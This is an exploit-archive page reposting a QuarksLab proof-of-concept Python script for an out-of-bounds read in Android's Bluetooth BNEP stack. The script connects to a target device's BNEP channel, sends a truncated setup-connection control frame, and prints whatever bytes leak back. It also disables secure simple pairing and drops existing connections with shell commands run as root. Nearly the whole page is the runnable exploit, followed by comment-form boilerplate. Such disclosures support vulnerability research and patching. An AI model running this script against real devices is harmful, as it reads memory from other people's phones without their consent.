Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read

2018.03.24
Credit: QuarksLab
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_CONTROL = 0x01 # Control types (parsed by bnep_process_control_packet() in bnep_utils.cc) BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01 def oob_read(src_bdaddr, dst): bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.settimeout(5) bnep.bind((src_bdaddr, 0)) print 'Connecting to BNEP...' bnep.connect((dst, BNEP_PSM)) bnep.settimeout(1) print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..." # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type, # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type. # It doesn't include the 'len' field, therefore it is read from out of bounds bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG)) try: data = bnep.recv(3) except bluetooth.btcommon.BluetoothError: data = '' if data: print '%r' % data else: print '[No data]' print 'Closing connection.' bnep.close() def main(src_hci, dst): os.system('hciconfig %s sspmode 0' % (src_hci,)) os.system('hcitool dc %s' % (dst,)) oob_read(src_hci, dst) if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>') else: if os.getuid(): print 'Error: This script must be run as root.' else: main(sys.argv[1], sys.argv[2])


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top